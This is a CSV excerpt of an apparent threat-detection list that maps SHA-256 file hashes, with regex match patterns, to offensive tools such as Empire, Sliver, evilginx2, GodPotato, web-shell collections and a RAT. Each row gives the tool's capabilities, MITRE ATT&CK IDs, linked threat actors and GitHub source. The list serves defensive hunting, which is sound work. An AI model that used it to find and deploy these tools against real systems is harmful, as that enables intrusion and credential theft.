"*241aa661189fa38aa2519055d8145944658c9234282a3dee30ab625eba575464*",".{0,1000}241aa661189fa38aa2519055d8145944658c9234282a3dee30ab625eba575464.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","23331"
"*242a11999f0c5b776400f2462854ef1d07101bd1085e3b29c9b7ba825c93a3fb*",".{0,1000}242a11999f0c5b776400f2462854ef1d07101bd1085e3b29c9b7ba825c93a3fb.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23333"
"*242e41d85fab89e16209aaac8fe816788ec9e9bfb032a03aeaf1419c4e10c186*",".{0,1000}242e41d85fab89e16209aaac8fe816788ec9e9bfb032a03aeaf1419c4e10c186.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","23334"
"*242edf5f22175e7bb921568de525cd1469c3462fbb5943a04f2cc681cff764f4*",".{0,1000}242edf5f22175e7bb921568de525cd1469c3462fbb5943a04f2cc681cff764f4.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","23335"
"*2437b5db59dd1b987232c3f0b4ed53408bce886e98e879887d3a1c52ee93e141*",".{0,1000}2437b5db59dd1b987232c3f0b4ed53408bce886e98e879887d3a1c52ee93e141.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","23338"
"*2438d7f90c0d3cef5082dc9072249c2965d6bbd5caf777cc00b09c18d29edcdb*",".{0,1000}2438d7f90c0d3cef5082dc9072249c2965d6bbd5caf777cc00b09c18d29edcdb.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23339"
"*2443660c8c3e8fcf80e028c6417a0110fde1f3a0961f70ffb960cbf64958e244*",".{0,1000}2443660c8c3e8fcf80e028c6417a0110fde1f3a0961f70ffb960cbf64958e244.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","23341"
"*2448bea950b409f78ec4ef893351cb860d45dde31736bb771f34adaa44e6344f*",".{0,1000}2448bea950b409f78ec4ef893351cb860d45dde31736bb771f34adaa44e6344f.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","23342"
"*245f1d201e526f91b4950e1c23328f2ac2b22d6da4d6c56aa63e3b512d980991*",".{0,1000}245f1d201e526f91b4950e1c23328f2ac2b22d6da4d6c56aa63e3b512d980991.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23344"
"*24683c103edd19d58c02b001521660f0eae642200ad42454ae810bd7aefaf46b*",".{0,1000}24683c103edd19d58c02b001521660f0eae642200ad42454ae810bd7aefaf46b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23346"
"*24690dc55d197a7a63bc2a80404a6e662c719e04bff38435796c666d1cfcb719*",".{0,1000}24690dc55d197a7a63bc2a80404a6e662c719e04bff38435796c666d1cfcb719.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","#filehash","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","23347"
"*24722c45c461dfbcd1e5c9d2cba90bbc6fb32d2bff58b8fbbfb18a852f7eebde*",".{0,1000}24722c45c461dfbcd1e5c9d2cba90bbc6fb32d2bff58b8fbbfb18a852f7eebde.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","23348"
"*2476217e429b83ee5584cd469558a374e054a604929150314e671f140f5d55c8*",".{0,1000}2476217e429b83ee5584cd469558a374e054a604929150314e671f140f5d55c8.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23349"
"*247b2e43787899a0235e4c0e97d819f0e05d3403c30e2d87c8b0a8ca80a74e8d*",".{0,1000}247b2e43787899a0235e4c0e97d819f0e05d3403c30e2d87c8b0a8ca80a74e8d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23351"
"*247f15b5f3b38c9cf825f0df792e38e68fe4d69a72d21f596b9b73f570408278*",".{0,1000}247f15b5f3b38c9cf825f0df792e38e68fe4d69a72d21f596b9b73f570408278.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23352"
"*2481d8ac474510659f30763ac99dd577b78285594f0ba281f08d83829ec56225*",".{0,1000}2481d8ac474510659f30763ac99dd577b78285594f0ba281f08d83829ec56225.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23353"
"*24882318e38e1e5778b7852196e754ead1af9de537ffd1dd3132467076dbda38*",".{0,1000}24882318e38e1e5778b7852196e754ead1af9de537ffd1dd3132467076dbda38.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","23354"
"*24a9917b1d657d5961df9c2e712e1528ae4c6e73541529bbf2aee3f360724c2e*",".{0,1000}24a9917b1d657d5961df9c2e712e1528ae4c6e73541529bbf2aee3f360724c2e.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","23357"
"*24aae23bcf8b0a513988d69b1526eebd791007136a1faf08ea1df5a8d3884e50*",".{0,1000}24aae23bcf8b0a513988d69b1526eebd791007136a1faf08ea1df5a8d3884e50.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","#filehash","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","23358"
"*24ae403a4b2844b646f6520b7eb7c6817f739759afca42b66c250424c46bc89a*",".{0,1000}24ae403a4b2844b646f6520b7eb7c6817f739759afca42b66c250424c46bc89a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23359"
"*24b25698a2b1e5035978642fdd0fb07dc44018e58723a4a674ff7e6c2bd3163e*",".{0,1000}24b25698a2b1e5035978642fdd0fb07dc44018e58723a4a674ff7e6c2bd3163e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23361"
"*24b3c82f54df63a856f237eab7bb1f7d85cbe83bc9a9f2c77df1d6abbe03268c*",".{0,1000}24b3c82f54df63a856f237eab7bb1f7d85cbe83bc9a9f2c77df1d6abbe03268c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23362"
"*24b3db5da23d7a56cfff2480ff4fb63ccb8fad4522c490b4478a22711a3ffa1c*",".{0,1000}24b3db5da23d7a56cfff2480ff4fb63ccb8fad4522c490b4478a22711a3ffa1c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","23363"
"*24b6f5f69fbc819dcfbdaa0efcfbf5a71f26f651e5c2310ebe495b193f89cce9*",".{0,1000}24b6f5f69fbc819dcfbdaa0efcfbf5a71f26f651e5c2310ebe495b193f89cce9.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","23364"
"*24b7191a8f1c5a64ef880f979ebcf6b2957278ecce023743714acddb4d9c1ebc*",".{0,1000}24b7191a8f1c5a64ef880f979ebcf6b2957278ecce023743714acddb4d9c1ebc.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","23365"
"*24bf6c85aacb6285b8f89f74b59ae1390c767bb9de880afdff3047117bc9d18d*",".{0,1000}24bf6c85aacb6285b8f89f74b59ae1390c767bb9de880afdff3047117bc9d18d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23367"
"*24C53132B594B77D2109CAEE3E276EA4603EEF32BFECD5121746DB58258C50F7*",".{0,1000}24C53132B594B77D2109CAEE3E276EA4603EEF32BFECD5121746DB58258C50F7.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#filehash","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","23369"
"*24d7bda466850d93fc1883a3937e1317fbb3f9e631ab0d2a4fa0b45c2c21c24f*",".{0,1000}24d7bda466850d93fc1883a3937e1317fbb3f9e631ab0d2a4fa0b45c2c21c24f.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","23372"
"*24d7bda466850d93fc1883a3937e1317fbb3f9e631ab0d2a4fa0b45c2c21c24f*",".{0,1000}24d7bda466850d93fc1883a3937e1317fbb3f9e631ab0d2a4fa0b45c2c21c24f.{0,1000}","offensive_tool_keyword","PassSpray","Domain Password Spray","T1110.003 - T1078","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/PassSpray","1","0","#filehash","N/A","10","1","7","3","2025-02-20T10:07:43Z","2023-11-16T13:35:49Z","23373"
"*24d861124682031773ac0f6df9e5011b18a8d925c8c22469330826e64ccc2bab*",".{0,1000}24d861124682031773ac0f6df9e5011b18a8d925c8c22469330826e64ccc2bab.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","#filehash #linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","23375"
"*24e3451e7466a3c1bb84250a85fdd4b004856c8087458119ccfe1631877f5e3b*",".{0,1000}24e3451e7466a3c1bb84250a85fdd4b004856c8087458119ccfe1631877f5e3b.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","23376"
"*24e84edaff898e6eacc5143afd258731fd8a8f31146ebb829b36b35a44cb1d94*",".{0,1000}24e84edaff898e6eacc5143afd258731fd8a8f31146ebb829b36b35a44cb1d94.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23377"
"*24eff9f3b53d50488cf9260a59dfa59afac34b67d6dba4d156127b9a72713088*",".{0,1000}24eff9f3b53d50488cf9260a59dfa59afac34b67d6dba4d156127b9a72713088.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23379"
"*24f4f092e673651bbd2ddc5a97f8da0cb9d2bbe49db773c691ca5f4251f4d871*",".{0,1000}24f4f092e673651bbd2ddc5a97f8da0cb9d2bbe49db773c691ca5f4251f4d871.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23380"
"*24f608e725ca4ca008b780bde8be2d27bfd9a1b4c9b4a106d4f679e75a21d2f2*",".{0,1000}24f608e725ca4ca008b780bde8be2d27bfd9a1b4c9b4a106d4f679e75a21d2f2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23381"
"*24fe09ac811357d1a5ddd63652604def847cb2d4f81c01ecfe563ead611783e3*",".{0,1000}24fe09ac811357d1a5ddd63652604def847cb2d4f81c01ecfe563ead611783e3.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","23384"
"*24fe09ac811357d1a5ddd63652604def847cb2d4f81c01ecfe563ead611783e3*",".{0,1000}24fe09ac811357d1a5ddd63652604def847cb2d4f81c01ecfe563ead611783e3.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","23385"
"*2504c2d20454d5caf5a0e24b497a3913c3289042b7fdf6bc336a25430085bc98*",".{0,1000}2504c2d20454d5caf5a0e24b497a3913c3289042b7fdf6bc336a25430085bc98.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23387"
"*2507ccefca7ad5cc4247bae065b0fefb7c3b16cf2d1190535473a05f213d5004*",".{0,1000}2507ccefca7ad5cc4247bae065b0fefb7c3b16cf2d1190535473a05f213d5004.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23388"
"*250abcb0da278460620cef30b9ab1c401b0e57a53642e5f6b357b9ca6b4fbfdc*",".{0,1000}250abcb0da278460620cef30b9ab1c401b0e57a53642e5f6b357b9ca6b4fbfdc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23389"
"*25110aab44570c065061044d38afc50eea45ca5f78bb2b70b0941d63c979cf62*",".{0,1000}25110aab44570c065061044d38afc50eea45ca5f78bb2b70b0941d63c979cf62.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","23390"
"*25125be2945ae98284abb64b279fe13021d1d02895b85a4e02a4fcd6ec8415cc*",".{0,1000}25125be2945ae98284abb64b279fe13021d1d02895b85a4e02a4fcd6ec8415cc.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","23391"
"*25151ae98c5657bd40a5318e86c8b341bf7a59d7e04b6b4658e644e6e6c42687*",".{0,1000}25151ae98c5657bd40a5318e86c8b341bf7a59d7e04b6b4658e644e6e6c42687.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23392"
"*2518c6ab5e78e0f644a5c406d84778eb45991564ba136c266d9696fc6996e8ef*",".{0,1000}2518c6ab5e78e0f644a5c406d84778eb45991564ba136c266d9696fc6996e8ef.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23393"
